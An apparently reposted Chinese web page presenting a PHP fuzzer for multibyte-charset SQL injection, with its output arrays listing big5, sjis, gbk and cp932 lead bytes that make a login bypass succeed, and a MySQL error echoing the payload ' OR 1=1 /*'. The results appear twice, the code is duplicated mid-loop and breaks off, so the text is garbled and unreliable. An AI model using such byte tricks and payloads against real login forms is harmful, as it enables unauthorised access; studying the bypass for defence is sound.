SQL Injection Encoding Attacks fuzzer.php
我的测试结果,代码在结果后面,:
引用
Array
(
[big5] => Array
(
[161] => 2
[162] => 2
[163] => 2
[164] => 2
[165] => 2
[166] => 2
[167] => 2
[168] => 2
[169] => 2
[170] => 2
[171] => 2
[172] => 2
[173] => 2
[174] => 2
[175] => 2
[176] => 2
[177] => 2
[178] => 2
[179] => 2
[180] => 2
[181] => 2
[182] => 2
[183] => 2
[184] => 2
[185] => 2
[186] => 2
[187] => 2
[188] => 2
[189] => 2
[190] => 2
[191] => 2
[192] => 2
[193] => 2
[194] => 2
[195] => 2
[196] => 2
[197] => 2
[198] => 2
[199] => 2
[200] => 2
[201] => 2
[202] => 2
[203] => 2
[204] => 2
[205] => 2
[206] => 2
[207] => 2
[208] => 2
[209] => 2
[210] => 2
[211] => 2
[212] => 2
[213] => 2
[214] => 2
[215] => 2
[216] => 2
[217] => 2
[218] => 2
[219] => 2
[220] => 2
[221] => 2
[222] => 2
[223] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
)
[sjis] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
)
[gbk] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[160] => 2
[161] => 2
[162] => 2
[163] => 2
[164] => 2
[165] => 2
[166] => 2
[167] => 2
[168] => 2
[169] => 2
[170] => 2
[171] => 2
[172] => 2
[173] => 2
[174] => 2
[175] => 2
[176] => 2
[177] => 2
[178] => 2
[179] => 2
[180] => 2
[181] => 2
[182] => 2
[183] => 2
[184] => 2
[185] => 2
[186] => 2
[187] => 2
[188] => 2
[189] => 2
[190] => 2
[191] => 2
[192] => 2
[193] => 2
[194] => 2
[195] => 2
[196] => 2
[197] => 2
[198] => 2
[199] => 2
[200] => 2
[201] => 2
[202] => 2
[203] => 2
[204] => 2
[205] => 2
[206] => 2
[207] => 2
[208] => 2
[209] => 2
[210] => 2
[211] => 2
[212] => 2
[213] => 2
[214] => 2
[215] => 2
[216] => 2
[217] => 2
[218] => 2
[219] => 2
[220] => 2
[221] => 2
[222] => 2
[223] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
[253] => 2
[254] => 2
)
[ucs2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near SELECT * FROM ucs2_users WHERE username = ÿ OR 1=1 /* AND password = any at line 1
[cp932] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
)
)
(
[big5] => Array
(
[161] => 2
[162] => 2
[163] => 2
[164] => 2
[165] => 2
[166] => 2
[167] => 2
[168] => 2
[169] => 2
[170] => 2
[171] => 2
[172] => 2
[173] => 2
[174] => 2
[175] => 2
[176] => 2
[177] => 2
[178] => 2
[179] => 2
[180] => 2
[181] => 2
[182] => 2
[183] => 2
[184] => 2
[185] => 2
[186] => 2
[187] => 2
[188] => 2
[189] => 2
[190] => 2
[191] => 2
[192] => 2
[193] => 2
[194] => 2
[195] => 2
[196] => 2
[197] => 2
[198] => 2
[199] => 2
[200] => 2
[201] => 2
[202] => 2
[203] => 2
[204] => 2
[205] => 2
[206] => 2
[207] => 2
[208] => 2
[209] => 2
[210] => 2
[211] => 2
[212] => 2
[213] => 2
[214] => 2
[215] => 2
[216] => 2
[217] => 2
[218] => 2
[219] => 2
[220] => 2
[221] => 2
[222] => 2
[223] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
)
[sjis] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
)
[gbk] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[160] => 2
[161] => 2
[162] => 2
[163] => 2
[164] => 2
[165] => 2
[166] => 2
[167] => 2
[168] => 2
[169] => 2
[170] => 2
[171] => 2
[172] => 2
[173] => 2
[174] => 2
[175] => 2
[176] => 2
[177] => 2
[178] => 2
[179] => 2
[180] => 2
[181] => 2
[182] => 2
[183] => 2
[184] => 2
[185] => 2
[186] => 2
[187] => 2
[188] => 2
[189] => 2
[190] => 2
[191] => 2
[192] => 2
[193] => 2
[194] => 2
[195] => 2
[196] => 2
[197] => 2
[198] => 2
[199] => 2
[200] => 2
[201] => 2
[202] => 2
[203] => 2
[204] => 2
[205] => 2
[206] => 2
[207] => 2
[208] => 2
[209] => 2
[210] => 2
[211] => 2
[212] => 2
[213] => 2
[214] => 2
[215] => 2
[216] => 2
[217] => 2
[218] => 2
[219] => 2
[220] => 2
[221] => 2
[222] => 2
[223] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
[253] => 2
[254] => 2
)
[ucs2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near SELECT * FROM ucs2_users WHERE username = ÿ OR 1=1 /* AND password = any at line 1
[cp932] => Array
(
[129] => 2
[130] => 2
[131] => 2
[132] => 2
[133] => 2
[134] => 2
[135] => 2
[136] => 2
[137] => 2
[138] => 2
[139] => 2
[140] => 2
[141] => 2
[142] => 2
[143] => 2
[144] => 2
[145] => 2
[146] => 2
[147] => 2
[148] => 2
[149] => 2
[150] => 2
[151] => 2
[152] => 2
[153] => 2
[154] => 2
[155] => 2
[156] => 2
[157] => 2
[158] => 2
[159] => 2
[224] => 2
[225] => 2
[226] => 2
[227] => 2
[228] => 2
[229] => 2
[230] => 2
[231] => 2
[232] => 2
[233] => 2
[234] => 2
[235] => 2
[236] => 2
[237] => 2
[238] => 2
[239] => 2
[240] => 2
[241] => 2
[242] => 2
[243] => 2
[244] => 2
[245] => 2
[246] => 2
[247] => 2
[248] => 2
[249] => 2
[250] => 2
[251] => 2
[252] => 2
)
)
<?php
error_reporting(E_ALL);
//先设置为1创建数据库及表,然后设置为0test
$switch = 0;
$mysqlhost = localhost;
$mysqluser = root;
$mysqlpass = root; // :p
$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);
//Old versions of PHP dont have this function, so you need to create the database manually.
if ($switch == 1) {
print "Creating database.....";
mysql_create_db ("fuzz", $c);
print "Done!<br /> ";
}
mysql_select_db("fuzz", $c);
$charsets = mysql_query("SHOW CHARACTER SET", $c);
mysql_close ($c);
if ($switch == 1) {
print "Creating tables.....<br /><br /> ";
}
while ($row = mysql_fetch_row($charsets)) {
print $row[0]."....";
$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);
mysql_select_db("fuzz", $c);
if ($switch == 1) {
// create demo table
mysql_query("CREATE TABLE ".$row[0]."_users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET ".$row[0]."", $c);
//populate table
mysql_query("INSERT INTO ".$row[0]."_users VALUES(foo,bar), (baz,test)", $c);
} else {
mysql_query("SET CHARACTER SET ".$row[0], $c);
for ($i=1;$i<256;$i++) {
error_reporting(E_ALL);
//先设置为1创建数据库及表,然后设置为0test
$switch = 0;
$mysqlhost = localhost;
$mysqluser = root;
$mysqlpass = root; // :p
$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);
//Old versions of PHP dont have this function, so you need to create the database manually.
if ($switch == 1) {
print "Creating database.....";
mysql_create_db ("fuzz", $c);
print "Done!<br /> ";
}
mysql_select_db("fuzz", $c);
$charsets = mysql_query("SHOW CHARACTER SET", $c);
mysql_close ($c);
if ($switch == 1) {
print "Creating tables.....<br /><br /> ";
}
while ($row = mysql_fetch_row($charsets)) {
print $row[0]."....";
$c = mysql_connect($mysqlhost, $mysqluser, $mysqlpass);
mysql_select_db("fuzz", $c);
if ($switch == 1) {
// create demo table
mysql_query("CREATE TABLE ".$row[0]."_users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET ".$row[0]."", $c);
//populate table
mysql_query("INSERT INTO ".$row[0]."_users VALUES(foo,bar), (baz,test)", $c);
} else {
mysql_query("SET CHARACTER SET ".$row[0], $c);
for ($i=1;$i<256;$i++) {
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻